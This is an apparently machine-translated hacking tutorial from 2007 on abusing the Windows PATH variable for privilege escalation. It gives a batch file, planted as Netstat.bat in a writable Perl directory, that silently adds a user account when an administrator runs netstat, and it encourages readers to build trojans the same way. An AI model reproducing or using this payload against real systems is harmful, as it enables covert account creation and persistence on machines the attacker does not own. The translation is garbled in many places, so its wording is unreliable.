Talk about environment variables in the Hacking of use-vulnerability warning-the black bar safety net

ID MYHACK58:62200717662
Type myhack58
Reporter 佚名
Modified 2007-11-19T00:00:00


This message has been sent to the Black hand of the tenth

First, we first understand under what environment variables! Environment variable generally refers to in theoperating systemis used to specify theoperating systemthe operating environment of some parameters, such as the temporary folder location and system folder locations, and so on. This point is somewhat similar to the DOS of the period of the default path, when you run some thread timing in addition to in the current folder looking for, but also to set the default path to find. For example the environment variable“Path”is a variable, which stores some commonly used commands the storage of the directory path.

To view the current system environment variables, you can use the SET command to view! The following is the implementation of the SET command after the Feedback information

ALLUSERSPROFILE=C:\Documents and Settings\All Users APPDATA=C:\Documents and Settings\Administrator\Application Data CLIENTNAME=Console CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=145F63CA0A6F46D ComSpec=C:\WINDOWS\system32\cmd.exe FP_NO_HOST_CHECK=NO HOMEDRIVE=C: HOMEPATH=\Documents and Settings\Administrator LOGONSERVER=\\145F63CA0A6F46D NUMBER_OF_PROCESSORS=2 OS=Windows_NT Path=D:\Progra~1\Borland\Delphi7\Bin;D:\Progra~1\Borland\Delphi7\Projects\Bpl\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem PATHEXT=.COM;. EXE; the. BAT;. CMD;. VBS;. VBE;. JS;. JSE;. WSF;. WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 1 5 Stepping 6, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0f06 ProgramFiles=C:\Program Files PROMPT=$P$G SESSIONNAME=Console SystemDrive=C: SystemRoot=C:\WINDOWS TEMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp TMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp USERDOMAIN=145F63CA0A6F46D USERNAME=Administrator USERPROFILE=C:\Documents and Settings\Administrator windir=C:\WINDOWS ====================================================================== We know that when we take the NC for a class of commonly used small tools to put in SYSTEM32, regardless of our current path in which, you can perform the NC command!------ Hacking also provides a lot of convenience, isn't it? In fact, this is the Path variable the role of the! If the Path variable in the contents of all deleted,then the original system commands the system will not recognize. That is, when we are in CMD, enter these commands, the system will be in the following order to find relevant procedures, to achieve directly the calling program or file. 1. The current directory of the executable file! 2. In order to find the Path variable in the specified directory!

OK, in substantially the awareness of the environment variable after, we began to cut into the theme, talk about how to use environment variables for our Hacking. We know that PERL is installed in the variable Path the content of the previously added c:\perl\bin //directory pursuant to loading and And when administrator permissions are improperly configured, will neglect this directory the permissions are configured(the default permission configuration, each of the WIN operating system to have write permissions), also will give we have created provide the right conditions.

Below I give a use example! //Is available, depending on the Path variable the location and the directory is writable //Environment variables must be in the system comes with environment variables before.

Assuming the conditions are as follows: Target installed PERL, and the directory is c:\perl\bin //Directory can be written System environment variables in the Path variable as follows Path=c:\perl\bin\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem We can in this directory create the following file Netstat. cmd or Netstat. bat //commonly used system commands are also available,please extrapolate! THX~ File content as follows

@net user netpatch /add>nul Rem the command must remember to add @ at the end add >nul Rem @in order to hide the command itself Rem >nul is in order to hide the command after the implementation of the results of the Feedback! @%systemroot%\system32\netstat.exe %1 %2 %3 %4 %5 %6 Rem learned batch commands students should know this behind the%1% 2% 3, etc., is from parameters of the role

When the administrator executes the command, since the Path variable c:\perl\bin in the system environment variables earlier, so, when the administrator executed the Netstat command, the system will first look in the current directory of the executable file, the default is”C:\Documents and Settings\Administrator\” (according to the login user)when couldn't find the Netstat program, it will then sequentially find the environment variables in the Path variable defined in the directory, the first one of course is c:\perl\bin directory...since the system is looking for is an executable program, SO...naturally found our Netstat. bat, then the system will of course perform our set of commands. Since we constructed the ingenious, is not exposed slightest himself away..a successful covert mention of the right to..... This is the thirty-six in. also....

Provide the right tips done...clever you might think..if, as a TROJAN? Oh~~ Why not?, have Idea, have to try...there's no test where a positive result?